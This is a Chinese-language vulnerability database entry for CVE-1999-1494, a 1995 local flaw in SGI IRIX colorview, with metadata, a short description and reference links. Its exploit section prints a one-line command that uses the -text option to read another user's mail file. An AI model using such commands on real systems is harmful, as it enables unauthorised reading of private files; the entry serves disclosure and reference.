Silicon Graphics IRIX漏洞-安全小百科

Silicon Graphics IRIX漏洞

漏洞ID	1105241	漏洞类型	未知
发布时间	1995-02-09	更新时间	2005-05-02
CVE编号	CVE-1999-1494	CNNVD-ID	CNNVD-199408-001
漏洞平台	IRIX	CVSS评分	2.1

|漏洞来源

https://www.exploit-db.com/exploits/19269
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199408-001

|漏洞详情

SiliconGraphicsIRIX5.1，5.2，和6.0版本中的colorview存在漏洞，本地用户可以通过-text参数来读取任意文件。

|漏洞EXP

source: http://www.securityfocus.com/bid/336/info

Colorview fails to validate that the user has access to the file supplied to the -text option. As a result, users can view arbitrary files. 

/usr/sbin/colorview -text /var/spool/mail/admin

|参考资料

来源:XF
名称:sgi-colorview(2112)
链接:http://xforce.iss.net/static/2112.php
来源:BUGTRAQ
名称:19950307sigh.anotherIrix5.2hole.
链接:http://www.tryc.on.ca/archives/bugtraq/1995_1/0614.html
来源:BID
名称:336
链接:http://www.securityfocus.com/bid/336
来源:SGI
名称:19950209-00-P
链接:ftp://patches.sgi.com/support/free/security/advisories/19950209-01-P
来源:BUGTRAQ
名称:19940809Re:IRIX5.2SecurityAdvisory
链接:http://www.securityfocus.com/archive/1/675